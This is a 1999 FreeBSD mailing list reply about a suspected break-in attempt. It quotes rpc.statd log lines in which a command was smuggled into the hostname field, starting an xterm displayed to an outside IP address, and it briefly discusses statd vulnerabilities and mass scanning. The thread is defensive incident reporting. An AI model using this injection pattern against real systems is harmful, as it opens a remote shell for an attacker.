From owner-freebsd-hackers Sat Feb 20 22: 5:53 1999 Delivered-To: freebsd-hackers@freebsd.org Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id D038A11B4A; Sat, 20 Feb 1999 22:05:25 -0800 (PST) (envelope-from nick@feralmonkey.org) Received: from shibumi (shibumi [203.41.114.182]) by shibumi.feralmonkey.org (Postfix) with ESMTP id 15EA5780B; Sat, 21 Feb 1998 17:10:35 +1100 (EST) Date: Sat, 21 Feb 1998 17:10:34 +1100 (EST) From: To: Greg Lehey Cc: FreeBSD Hackers , FreeBSD-isp@freebsd.org Subject: Re: New breakin technique? In-Reply-To: <19990221141243.G93492@lemis.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG There has been issues with statd on both solaris and linux. It may simply be someone running a mass-scan. Nick On Sun, 21 Feb 1999, Greg Lehey wrote: > I've just found the following messages in my logs: > > Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 > Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 > Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0; > > Has anybody seen something like this? It looks as if somebody is > trying to break in, but I didn't know that rpc.statd could start > xterms. > > Under these circumstances, it would be interesting to know if > rpc.statd *must* run as root. Wouldn't, say, bin be enough? > > Greg > -- > See complete headers for address, home page and phone numbers > finger grog@lemis.com for PGP public key > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-hackers" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message